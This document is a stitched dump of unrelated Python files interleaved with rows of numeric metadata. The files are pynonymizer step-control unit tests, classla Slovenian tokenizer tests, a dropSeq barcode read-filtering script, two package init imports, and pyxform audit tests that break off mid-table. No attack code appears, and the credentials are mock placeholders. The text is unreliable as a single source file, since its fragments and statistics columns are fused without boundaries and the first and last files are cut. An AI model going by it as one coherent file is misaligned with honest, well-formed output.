a rough smoke test for the main process. This needs an integration test to back it up.
"""
pynonymize(
input_path="TEST_INPUT",
strategyfile_path="TEST_STRATEGYFILE",
output_path="TEST_OUTPUT",
db_type="TEST_TYPE",
db_host="TEST_HOST",
db_port="TEST_PORT",
db_name="TEST_NAME",
db_user="TEST_USER",
db_password="TEST_PASSWORD",
fake_locale="TEST_LOCALE",
seed_rows=999
)
StrategyParser.return_value.parse_config.assert_called()
get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=999)
provider = get_provider.return_value
provider.create_database.assert_called()
provider.restore_database.assert_called()
provider.anonymize_database.assert_called()
provider.dump_database.assert_called()
provider.drop_database.assert_called()
def test_pynonymize_stop_at_step(self, StrategyParser, FakeColumnSet, get_provider, read_config):
pynonymize(
input_path="TEST_INPUT",
strategyfile_path="TEST_STRATEGYFILE",
output_path="TEST_OUTPUT",
db_type="TEST_TYPE",
db_host="TEST_HOST",
db_port="TEST_PORT",
db_name="TEST_NAME",
db_user="TEST_USER",
db_password="TEST_PASSWORD",
fake_locale="TEST_LOCALE",
stop_at_step="ANONYMIZE_DB"
)
StrategyParser.return_value.parse_config.assert_called()
get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150)
provider = get_provider.return_value
provider.create_database.assert_called()
provider.restore_database.assert_called()
provider.anonymize_database.assert_called()
provider.dump_database.assert_not_called()
provider.drop_database.assert_not_called()
def test_pynonymize_skip_steps(self, StrategyParser, FakeColumnSet, get_provider,
read_config):
pynonymize(
input_path="TEST_INPUT",
strategyfile_path="TEST_STRATEGYFILE",
output_path="TEST_OUTPUT",
db_type="TEST_TYPE",
db_host="TEST_HOST",
db_port="TEST_PORT",
db_name="TEST_NAME",
db_user="TEST_USER",
db_password="TEST_PASSWORD",
fake_locale="TEST_LOCALE",
skip_steps=["ANONYMIZE_DB", "CREATE_DB", "DUMP_DB"]
)
get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150)
provider = get_provider.return_value
provider.create_database.assert_not_called()
provider.restore_database.assert_called()
provider.anonymize_database.assert_not_called()
provider.dump_database.assert_not_called()
provider.drop_database.assert_called()
def test_pynonymize_start_at_step(self, StrategyParser, FakeColumnSet, get_provider,
read_config):
pynonymize(
input_path="TEST_INPUT",
strategyfile_path="TEST_STRATEGYFILE",
output_path="TEST_OUTPUT",
db_type="TEST_TYPE",
db_host="TEST_HOST",
db_port="TEST_PORT",
db_name="TEST_NAME",
db_user="TEST_USER",
db_password="TEST_PASSWORD",
fake_locale="TEST_LOCALE",
start_at_step="ANONYMIZE_DB"
)
StrategyParser.return_value.parse_config.assert_called()
get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150)
provider = get_provider.return_value
provider.create_database.assert_not_called()
provider.restore_database.assert_not_called()
provider.anonymize_database.assert_called()
provider.dump_database.assert_called()
provider.drop_database.assert_called()
@patch("dotenv.find_dotenv", Mock())
@patch("dotenv.load_dotenv", Mock())
@patch("pynonymizer.pynonymize.read_config")
@patch("pynonymizer.pynonymize.get_provider")
@patch("pynonymizer.pynonymize.FakeColumnGenerator")
@patch("pynonymizer.pynonymize.StrategyParser")
@patch("builtins.open", mock_open(read_data="TESTFILEDATA"))
class OptionalArgumentsSkippedTests(unittest.TestCase):
"""
pynonymize should not throw argument validation errors for missing "mandatory" args
that are only mandatory for certain steps.
START = 0
GET_SOURCE = 100
CREATE_DB = 200
RESTORE_DB = 300
ANONYMIZE_DB = 400
DUMP_DB = 500
DROP_DB = 600
END = 9999
"""
def test_optional_input_when_skip_input_steps(self, StrategyParser, FakeColumnSet,
get_provider, read_config):
pynonymize(
input_path=None,
strategyfile_path="TEST_STRATEGYFILE",
output_path="TEST_OUTPUT",
db_type="TEST_TYPE",
db_host="TEST_HOST",
db_port="TEST_PORT",
db_name="TEST_NAME",
db_user="TEST_USER",
db_password="TEST_PASSWORD",
fake_locale="TEST_LOCALE",
start_at_step=None,
stop_at_step=None,
skip_steps=["RESTORE_DB"]
)
StrategyParser.return_value.parse_config.assert_called()
get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150)
provider = get_provider.return_value
provider.create_database.assert_called()
provider.restore_database.assert_not_called()
provider.anonymize_database.assert_called()
provider.dump_database.assert_called()
provider.drop_database.assert_called()
def test_optional_input_when_start_at_after_input_steps(self, StrategyParser, FakeColumnSet,
get_provider, read_config):
pynonymize(
input_path=None,
strategyfile_path="TEST_STRATEGYFILE",
output_path="TEST_OUTPUT",
db_type="TEST_TYPE",
db_host="TEST_HOST",
db_port="TEST_PORT",
db_name="TEST_NAME",
db_user="TEST_USER",
db_password="TEST_PASSWORD",
fake_locale="TEST_LOCALE",
start_at_step="ANONYMIZE_DB",
stop_at_step=None,
skip_steps=None
)
StrategyParser.return_value.parse_config.assert_called()
get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150)
provider = get_provider.return_value
provider.create_database.assert_not_called()
provider.restore_database.assert_not_called()
provider.anonymize_database.assert_called()
provider.dump_database.assert_called()
provider.drop_database.assert_called()
def test_optional_input_when_stop_at_before_input_steps(self, StrategyParser, FakeColumnSet,
get_provider, read_config):
pynonymize(
input_path=None,
strategyfile_path="TEST_STRATEGYFILE",
output_path="TEST_OUTPUT",
db_type="TEST_TYPE",
db_host="TEST_HOST",
db_port="TEST_PORT",
db_name="TEST_NAME",
db_user="TEST_USER",
db_password="TEST_PASSWORD",
fake_locale="TEST_LOCALE",
start_at_step=None,
stop_at_step="CREATE_DB",
skip_steps=None
)
get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150)
provider = get_provider.return_value
provider.create_database.assert_called()
provider.restore_database.assert_not_called()
provider.anonymize_database.assert_not_called()
provider.dump_database.assert_not_called()
provider.drop_database.assert_not_called()
def test_optional_strategyfile_when_skip_anonymize(self, StrategyParser, FakeColumnSet,
get_provider, read_config):
pynonymize(
input_path="TEST_INPUT",
strategyfile_path=None,
output_path="TEST_OUTPUT",
db_type="TEST_TYPE",
db_host="TEST_HOST",
db_port="TEST_PORT",
db_name="TEST_NAME",
db_user="TEST_USER",
db_password="TEST_PASSWORD",
fake_locale="TEST_LOCALE",
start_at_step=None,
stop_at_step=None,
skip_steps=["ANONYMIZE_DB"]
)
get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150)
provider = get_provider.return_value
provider.create_database.assert_called()
provider.restore_database.assert_called()
provider.anonymize_database.assert_not_called()
provider.dump_database.assert_called()
provider.drop_database.assert_called()
def test_optional_strategyfile_when_start_at_after_anonymize(self, StrategyParser, FakeColumnSet,
get_provider, read_config):
pynonymize(
input_path="TEST_INPUT",
strategyfile_path=None,
output_path="TEST_OUTPUT",
db_type="TEST_TYPE",
db_host="TEST_HOST",
db_port="TEST_PORT",
db_name="TEST_NAME",
db_user="TEST_USER",
db_password="TEST_PASSWORD",
fake_locale="TEST_LOCALE",
start_at_step="DUMP_DB",
stop_at_step=None,
skip_steps=None
)
get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150)
provider = get_provider.return_value
provider.create_database.assert_not_called()
provider.restore_database.assert_not_called()
provider.anonymize_database.assert_not_called()
provider.dump_database.assert_called()
provider.drop_database.assert_called()
def test_optional_strategyfile_when_stop_at_before_anonymize(self, StrategyParser, FakeColumnSet,
get_provider, read_config):
pynonymize(
input_path="TEST_INPUT",
strategyfile_path=None,
output_path="TEST_OUTPUT",
db_type="TEST_TYPE",
db_host="TEST_HOST",
db_port="TEST_PORT",
db_name="TEST_NAME",
db_user="TEST_USER",
db_password="TEST_PASSWORD",
fake_locale="TEST_LOCALE",
start_at_step=None,
stop_at_step="RESTORE_DB",
skip_steps=None
)
get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150)
provider = get_provider.return_value
provider.create_database.assert_called()
provider.restore_database.assert_called()
provider.anonymize_database.assert_not_called()
provider.dump_database.assert_not_called()
provider.drop_database.assert_not_called()
def test_optional_output_when_skip_output_steps(self, StrategyParser, FakeColumnSet,
get_provider, read_config):
pynonymize(
input_path="TEST_INPUT",
strategyfile_path="TEST_STRATEGYFILE",
output_path=None,
db_type="TEST_TYPE",
db_host="TEST_HOST",
db_port="TEST_PORT",
db_name="TEST_NAME",
db_user="TEST_USER",
db_password="TEST_PASSWORD",
fake_locale="TEST_LOCALE",
start_at_step=None,
stop_at_step=None,
skip_steps=["DUMP_DB"]
)
StrategyParser.return_value.parse_config.assert_called()
get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150)
provider = get_provider.return_value
provider.create_database.assert_called()
provider.restore_database.assert_called()
provider.anonymize_database.assert_called()
provider.dump_database.assert_not_called()
provider.drop_database.assert_called()
def test_optional_output_when_start_at_after_output_steps(self, StrategyParser, FakeColumnSet,
get_provider, read_config):
pynonymize(
input_path="TEST_INPUT",
strategyfile_path="TEST_STRATEGYFILE",
output_path=None,
db_type="TEST_TYPE",
db_host="TEST_HOST",
db_port="TEST_PORT",
db_name="TEST_NAME",
db_user="TEST_USER",
db_password="TEST_PASSWORD",
fake_locale="TEST_LOCALE",
start_at_step="DROP_DB",
stop_at_step=None,
skip_steps=None
)
get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150)
provider = get_provider.return_value
provider.create_database.assert_not_called()
provider.restore_database.assert_not_called()
provider.anonymize_database.assert_not_called()
provider.dump_database.assert_not_called()
provider.drop_database.assert_called()
def test_optional_output_when_stop_at_before_output_steps(self, StrategyParser, FakeColumnSet,
get_provider, read_config):
pynonymize(
input_path="TEST_INPUT",
strategyfile_path="TEST_STRATEGYFILE",
output_path=None,
db_type="TEST_TYPE",
db_host="TEST_HOST",
db_port="TEST_PORT",
db_name="TEST_NAME",
db_user="TEST_USER",
db_password="TEST_PASSWORD",
fake_locale="TEST_LOCALE",
start_at_step=None,
stop_at_step=None,
skip_steps=["DUMP_DB"]
)
StrategyParser.return_value.parse_config.assert_called()
get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150)
provider = get_provider.return_value
provider.create_database.assert_called()
provider.restore_database.assert_called()
provider.anonymize_database.assert_called()
provider.dump_database.assert_not_called()
provider.drop_database.assert_called()
| 41.47486
| 219
| 0.650368
| 2,578
| 22,272
| 5.185415
| 0.071761
| 0.060144
| 0.056852
| 0.031418
| 0.851287
| 0.847098
| 0.840215
| 0.832436
| 0.826975
| 0.825479
| 0
| 0.005349
| 0.252963
| 22,272
| 536
| 220
| 41.552239
| 0.798113
| 0.038389
| 0
| 0.789709
| 0
| 0
| 0.174249
| 0.0256
| 0
| 0
| 0
| 0
| 0.221477
| 1
| 0.04698
| false
| 0.073826
| 0.013423
| 0
| 0.067114
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
e1519342f85347775bd32cc5b68349173ed0bc52
| 3,764
|
py
|
Python
|
tests_classla/test_tokenizer.py
|
clarinsi/classla-stanfordnlp
|
25fb417f6b4a2bc52c1bf89ee55eddbc256cbc19
|
[
"Apache-2.0"
] | 12
|
2019-11-25T14:51:21.000Z
|
2021-02-21T16:59:38.000Z
|
tests_classla/test_tokenizer.py
|
clarinsi/classla
|
229148f3942ff3428741f4004b7d6643b8a4dc45
|
[
"Apache-2.0"
] | 23
|
2021-03-12T13:17:17.000Z
|
2022-02-14T08:56:53.000Z
|
tests_classla/test_tokenizer.py
|
clarinsi/classla
|
229148f3942ff3428741f4004b7d6643b8a4dc45
|
[
"Apache-2.0"
] | 7
|
2021-04-04T15:04:27.000Z
|
2022-02-20T17:33:39.000Z
|
"""
Basic testing of tokenization
"""
import classla
from tests_classla import *
SL_DOC = "France Prešeren je bil rojen v Vrbi. Danes je poznan kot največji slovenski pesnik. Študiral je na Dunaju."
SL_DOC_GOLD_TOKENS = """
<Token id=1;words=[<Word id=1;text=France>]>
<Token id=2;words=[<Word id=2;text=Prešeren>]>
<Token id=3;words=[<Word id=3;text=je>]>
<Token id=4;words=[<Word id=4;text=bil>]>
<Token id=5;words=[<Word id=5;text=rojen>]>
<Token id=6;words=[<Word id=6;text=v>]>
<Token id=7;words=[<Word id=7;text=Vrbi>]>
<Token id=8;words=[<Word id=8;text=.>]>
<Token id=1;words=[<Word id=1;text=Danes>]>
<Token id=2;words=[<Word id=2;text=je>]>
<Token id=3;words=[<Word id=3;text=poznan>]>
<Token id=4;words=[<Word id=4;text=kot>]>
<Token id=5;words=[<Word id=5;text=največji>]>
<Token id=6;words=[<Word id=6;text=slovenski>]>
<Token id=7;words=[<Word id=7;text=pesnik>]>
<Token id=8;words=[<Word id=8;text=.>]>
<Token id=1;words=[<Word id=1;text=Študiral>]>
<Token id=2;words=[<Word id=2;text=je>]>
<Token id=3;words=[<Word id=3;text=na>]>
<Token id=4;words=[<Word id=4;text=Dunaju>]>
<Token id=5;words=[<Word id=5;text=.>]>
""".strip()
SL_DOC_PRETOKENIZED = \
"France Prešeren je bil rojen v Vrbi .\nDanes je poznan kot največji slovenski pesnik .\n\nŠtudiral je na Dunaju.\n"
SL_DOC_PRETOKENIZED_GOLD_TOKENS = """
<Token id=1;words=[<Word id=1;text=France>]>
<Token id=2;words=[<Word id=2;text=Prešeren>]>
<Token id=3;words=[<Word id=3;text=je>]>
<Token id=4;words=[<Word id=4;text=bil>]>
<Token id=5;words=[<Word id=5;text=rojen>]>
<Token id=6;words=[<Word id=6;text=v>]>
<Token id=7;words=[<Word id=7;text=Vrbi>]>
<Token id=8;words=[<Word id=8;text=.>]>
<Token id=1;words=[<Word id=1;text=Danes>]>
<Token id=2;words=[<Word id=2;text=je>]>
<Token id=3;words=[<Word id=3;text=poznan>]>
<Token id=4;words=[<Word id=4;text=kot>]>
<Token id=5;words=[<Word id=5;text=največji>]>
<Token id=6;words=[<Word id=6;text=slovenski>]>
<Token id=7;words=[<Word id=7;text=pesnik>]>
<Token id=8;words=[<Word id=8;text=.>]>
<Token id=1;words=[<Word id=1;text=Študiral>]>
<Token id=2;words=[<Word id=2;text=je>]>
<Token id=3;words=[<Word id=3;text=na>]>
<Token id=4;words=[<Word id=4;text=Dunaju.>]>
""".strip()
SL_DOC_PRETOKENIZED_LIST = [['France', 'Prešeren', 'je', 'bil', 'rojen', 'v', 'Vrbi', '.'], ['Danes', 'živi', 'v',
'poeziji', '.']]
SL_DOC_PRETOKENIZED_LIST_GOLD_TOKENS = """
<Token id=1;words=[<Word id=1;text=France>]>
<Token id=2;words=[<Word id=2;text=Prešeren>]>
<Token id=3;words=[<Word id=3;text=je>]>
<Token id=4;words=[<Word id=4;text=bil>]>
<Token id=5;words=[<Word id=5;text=rojen>]>
<Token id=6;words=[<Word id=6;text=v>]>
<Token id=7;words=[<Word id=7;text=Vrbi>]>
<Token id=8;words=[<Word id=8;text=.>]>
<Token id=1;words=[<Word id=1;text=Danes>]>
<Token id=2;words=[<Word id=2;text=živi>]>
<Token id=3;words=[<Word id=3;text=v>]>
<Token id=4;words=[<Word id=4;text=poeziji>]>
<Token id=5;words=[<Word id=5;text=.>]>
""".strip()
def test_tokenize():
nlp = classla.Pipeline(processors='tokenize', dir=TEST_MODELS_DIR, lang='sl')
doc = nlp(SL_DOC)
assert SL_DOC_GOLD_TOKENS == '\n\n'.join([sent.tokens_string() for sent in doc.sentences])
def test_pretokenized():
nlp = classla.Pipeline(**{'processors': 'tokenize', 'dir': TEST_MODELS_DIR, 'lang': 'sl',
'tokenize_pretokenized': True})
doc = nlp(SL_DOC_PRETOKENIZED)
assert SL_DOC_PRETOKENIZED_GOLD_TOKENS == '\n\n'.join([sent.tokens_string() for sent in doc.sentences])
doc = nlp(SL_DOC_PRETOKENIZED_LIST)
assert SL_DOC_PRETOKENIZED_LIST_GOLD_TOKENS == '\n\n'.join([sent.tokens_string() for sent in doc.sentences])
| 36.901961
| 120
| 0.64559
| 662
| 3,764
| 3.599698
| 0.099698
| 0.158624
| 0.249266
| 0.043642
| 0.882921
| 0.84935
| 0.803189
| 0.79102
| 0.742342
| 0.718003
| 0
| 0.032857
| 0.126727
| 3,764
| 101
| 121
| 37.267327
| 0.69212
| 0.007705
| 0
| 0.666667
| 0
| 0.025641
| 0.71854
| 0.056882
| 0
| 0
| 0
| 0
| 0.038462
| 1
| 0.025641
| false
| 0
| 0.025641
| 0
| 0.051282
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
beca77ca554c03b5eb7d500fa14347dd68771958
| 4,336
|
py
|
Python
|
src/script/filter_reads.py
|
guangyu-zhou/scRNA-Clustering
|
814360bdc596596f84dcf1b585d323dfcd7b97a6
|
[
"MIT"
] | 2
|
2019-07-07T05:30:13.000Z
|
2019-07-19T04:46:53.000Z
|
src/script/filter_reads.py
|
guangyu-zhou/scRNA-Clustering
|
814360bdc596596f84dcf1b585d323dfcd7b97a6
|
[
"MIT"
] | null | null | null |
src/script/filter_reads.py
|
guangyu-zhou/scRNA-Clustering
|
814360bdc596596f84dcf1b585d323dfcd7b97a6
|
[
"MIT"
] | 1
|
2018-08-31T11:32:44.000Z
|
2018-08-31T11:32:44.000Z
|
# awk -F" " '{print $1}' E31_REP1_HKT73BGX2_1.fastq | grep '^@' > E31_REP1_HKT73BGX2_all_reads.fastq
# diff --new-line-format="" --unchanged-line-format="" <(sort E31_REP1_HKT73BGX2_all_reads.fastq) <(sort E31_REP1_HKT73BGX2_reads_filtered.fastq) > E31_REP1_HKT73BGX2_removed.fastq
import matplotlib as mpl
mpl.use('Agg')
# import matplotlib.pyplot as plt
import numpy as np
import math
import pylab as plt
def process_individual():
path = '/home/zgy_ucla_cs/data/dropSeq/'
low_qual_reads = set()
with open(path + "E31_REP1_HKT73BGX2_removed.fastq") as infile0:
for line in infile0:
line = line.strip()
low_qual_reads.add(line)
# break
print ("done with low_qual_reads reading")
# print(len(low_qual_reads), low_qual_reads)
bar_read = {}
with open(path + "E31_REP1_HKT73BGX2_1.fastq") as infile:
count = 0
readname = ''
barcode = ''
for line in infile:
line = line.strip()
count+=1
if count % 1000000 == 0:
print(count)
if count % 4 == 1:
readname = line.split()[0]
# print(readname)
if count % 4 == 2:
barcode = line
if count % 4 == 3 and readname not in low_qual_reads:
# if count % 4 == 3:
# if readname in low_qual_reads:
# print readname
if barcode not in bar_read:
bar_read[barcode] = [readname]
else:
bar_read[barcode].append(readname)
# if count > 100000:
# break
print("Bar size", len(bar_read))
f1 = open(path + "E31_REP1_HKT73BGX2_cluster_1.fastq", 'w+')
f_other = open(path + "E31_REP1_HKT73BGX2_cluster_other.fastq", 'w+')
for key in bar_read.keys():
list1 = bar_read[key]
str1 = ' '.join(list1)
if len(list1) == 1:
f1.write(key + ' ' + str1 + '\n')
else:
f_other.write(key + ' ' + str1 + '\n')
print("start plotting histogram")
read_cluster_size = []
for elem in bar_read.values():
if len(elem) > 1:
read_cluster_size.append(len(elem))
# print read_cluster_size
bins = np.linspace(math.ceil(min(read_cluster_size)),
math.floor(max(read_cluster_size)),
100) # fixed number of bins
plt.hist(read_cluster_size, bins = bins) # arguments are passed to np.histogram
plt.title("Histogram with 100 bins, log scale")
plt.gca().set_yscale("log")
plt.savefig(path + "E31_REP1_HKT73BGX2_cluster_size.png")
def process_all():
path = '/home/zgy_ucla_cs/data/dropSeq/'
low_qual_reads = set()
rep_names = ['E31_REP1_HKT73BGX2', 'E31_REP2_HHN7NBGX3', 'E31_REP3_HHNKFBGX3']
for rep in rep_names:
with open(path + rep+ "_removed.fastq") as infile0:
for line in infile0:
line = line.strip()
low_qual_reads.add(line)
# break
print ("done with low_qual_reads reading", len(low_qual_reads))
bar_read = {}
for rep in rep_names:
with open(path + rep + "_1.fastq") as infile:
print("processing", rep)
count = 0
readname = ''
barcode = ''
for line in infile:
line = line.strip()
count+=1
if count % 1000000 == 0:
print(count)
if count % 4 == 1:
readname = line.split()[0]
# print(readname)
if count % 4 == 2:
barcode = line
if count % 4 == 3 and readname not in low_qual_reads:
# if count % 4 == 3:
# if readname in low_qual_reads:
# print readname
if barcode not in bar_read:
bar_read[barcode] = [readname]
else:
bar_read[barcode].append(readname)
# if count > 100000:
# break
print("Bar size", len(bar_read))
f1 = open(path + "All_cluster_1.fastq", 'w+')
f_other = open(path + "All_cluster_other.fastq", 'w+')
for key in bar_read.keys():
list1 = bar_read[key]
str1 = ' '.join(list1)
if len(list1) == 1:
f1.write(key + ' ' + str1 + '\n')
else:
f_other.write(key + ' ' + str1 + '\n')
print("start plotting histogram")
read_cluster_size = []
for elem in bar_read.values():
if len(elem) > 0:
read_cluster_size.append(len(elem))
# print read_cluster_size
np.save(path + 'All_cluster_size', np.array(read_cluster_size))
bins = np.linspace(math.ceil(min(read_cluster_size)),
math.floor(max(read_cluster_size)),
500) # fixed number of bins
plt.hist(read_cluster_size, bins = bins) # arguments are passed to np.histogram
plt.title("Cluster size distritbuion, log scale")
plt.gca().set_yscale("log")
plt.savefig(path + "All_cluster_size.png")
process_all()
| 27.794872
| 180
| 0.656365
| 646
| 4,336
| 4.195046
| 0.190402
| 0.069004
| 0.057565
| 0.0369
| 0.828782
| 0.785609
| 0.731734
| 0.731734
| 0.71107
| 0.688192
| 0
| 0.047841
| 0.20941
| 4,336
| 155
| 181
| 27.974194
| 0.742707
| 0.170664
| 0
| 0.733945
| 0
| 0
| 0.173669
| 0.070028
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018349
| false
| 0
| 0.036697
| 0
| 0.055046
| 0.082569
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
83085e48c48b6419d461560cae266c776af59eea
| 37
|
py
|
Python
|
hello_world_python_package/__init__.py
|
jlimahaverford/hello_world_python_package
|
b1af625346dfa559fbecb04d9c1ccce0e16e01b6
|
[
"MIT"
] | null | null | null |
hello_world_python_package/__init__.py
|
jlimahaverford/hello_world_python_package
|
b1af625346dfa559fbecb04d9c1ccce0e16e01b6
|
[
"MIT"
] | null | null | null |
hello_world_python_package/__init__.py
|
jlimahaverford/hello_world_python_package
|
b1af625346dfa559fbecb04d9c1ccce0e16e01b6
|
[
"MIT"
] | null | null | null |
from .hello_world import hello_world
| 18.5
| 36
| 0.864865
| 6
| 37
| 5
| 0.666667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 37
| 1
| 37
| 37
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
832de6dbe6f915e3d9dfc6c0faf75499ce4676da
| 180
|
py
|
Python
|
swearjar/GUI/Tabs/__init__.py
|
CptJamesCook/SwearJar
|
9bc7a389242c4c21c5b021eb8df5d7529ca5d9a8
|
[
"MIT"
] | null | null | null |
swearjar/GUI/Tabs/__init__.py
|
CptJamesCook/SwearJar
|
9bc7a389242c4c21c5b021eb8df5d7529ca5d9a8
|
[
"MIT"
] | null | null | null |
swearjar/GUI/Tabs/__init__.py
|
CptJamesCook/SwearJar
|
9bc7a389242c4c21c5b021eb8df5d7529ca5d9a8
|
[
"MIT"
] | null | null | null |
"""Import all the tabs on import of module."""
from swearjar.GUI.Tabs.guiTab import GUITab
from swearjar.GUI.Tabs.tabEx1 import tabEx1
from swearjar.GUI.Tabs.tabEx2 import tabEx2
| 30
| 46
| 0.794444
| 29
| 180
| 4.931034
| 0.448276
| 0.251748
| 0.314685
| 0.398601
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025157
| 0.116667
| 180
| 5
| 47
| 36
| 0.874214
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
36b5f19f6e6f629dbab80da89c067ceebb6cc783
| 10,770
|
py
|
Python
|
tests/test_audit.py
|
ukanga/pyxform
|
f4ce2ec7f90d3e197b9b5b58fecccabe31d213f8
|
[
"BSD-2-Clause"
] | 67
|
2015-02-02T17:49:25.000Z
|
2022-02-18T06:31:52.000Z
|
tests/test_audit.py
|
ukanga/pyxform
|
f4ce2ec7f90d3e197b9b5b58fecccabe31d213f8
|
[
"BSD-2-Clause"
] | 477
|
2015-01-14T15:48:44.000Z
|
2022-03-29T16:37:22.000Z
|
tests/test_audit.py
|
ukanga/pyxform
|
f4ce2ec7f90d3e197b9b5b58fecccabe31d213f8
|
[
"BSD-2-Clause"
] | 86
|
2015-01-26T13:16:26.000Z
|
2022-01-20T21:40:54.000Z
|
# -*- coding: utf-8 -*-
"""
AuditTest - test audit question type.
"""
from tests.pyxform_test_case import PyxformTestCase
class AuditTest(PyxformTestCase):
"""
AuditTest - test audit question type.
"""
def test_audit(self):
self.assertPyxformXform(
name="meta_audit",
md="""
| survey | | | |
| | type | name | label |
| | audit | audit | |
""",
xml__contains=[
"<meta>",
"<audit/>",
"</meta>",
'<bind nodeset="/meta_audit/meta/audit" type="binary"/>',
],
)
def test_audit_random_name(self):
self.assertPyxformXform(
name="meta_audit",
md="""
| survey | | | |
| | type | name | label |
| | audit | bobby | |
""",
errored=True,
error__contains=["Audits must always be named 'audit.'"],
)
def test_audit_blank_name(self):
self.assertPyxformXform(
name="meta_audit",
md="""
| survey | | | |
| | type | name | label |
| | audit | | |
""",
xml__contains=[
"<meta>",
"<audit/>",
"</meta>",
'<bind nodeset="/meta_audit/meta/audit" type="binary"/>',
],
)
def test_audit_blank_parameters(self):
self.assertPyxformXform(
name="meta_audit",
md="""
| survey | | | | |
| | type | name | label | parameters |
| | audit | | | |
""",
xml__contains=[
"<meta>",
"<audit/>",
"</meta>",
'<bind nodeset="/meta_audit/meta/audit" type="binary"/>',
],
)
def test_audit_location_required_parameters(self):
self.assertPyxformXform(
name="meta_audit",
md="""
| survey | | | |
| | type | name | parameters |
| | audit | audit | location-max-age=3, location-min-interval=1 |
""",
errored=True,
error__contains=[
"'location-priority', 'location-min-interval', and 'location-max-age' are required parameters"
],
)
def test_audit_location_priority_values(self):
self.assertPyxformXform(
name="meta_audit",
md="""
| survey | | | |
| | type | name | parameters |
| | audit | audit | location-priority=foo, location-min-interval=1, location-max-age=2 |
""",
errored=True,
error__contains=[
"location-priority must be set to no-power, low-power, balanced, or high-accuracy"
],
)
def test_audit_location_max_age_gt_min_interval(self):
self.assertPyxformXform(
name="meta_audit",
md="""
| survey | | | |
| | type | name | parameters |
| | audit | audit | location-priority=balanced, location-min-interval=2, location-max-age=1 |
""",
errored=True,
error__contains=[
"location-max-age must be greater than or equal to location-min-interval"
],
)
def test_audit_location_min_interval_positive(self):
self.assertPyxformXform(
name="meta_audit",
md="""
| survey | | | |
| | type | name | parameters |
| | audit | audit | location-priority=balanced, location-min-interval=-1, location-max-age=1 |
""",
errored=True,
error__contains=[
"location-min-interval must be greater than or equal to zero"
],
)
def test_audit_location(self):
self.assertPyxformXform(
name="meta_audit",
md="""
| survey | | | |
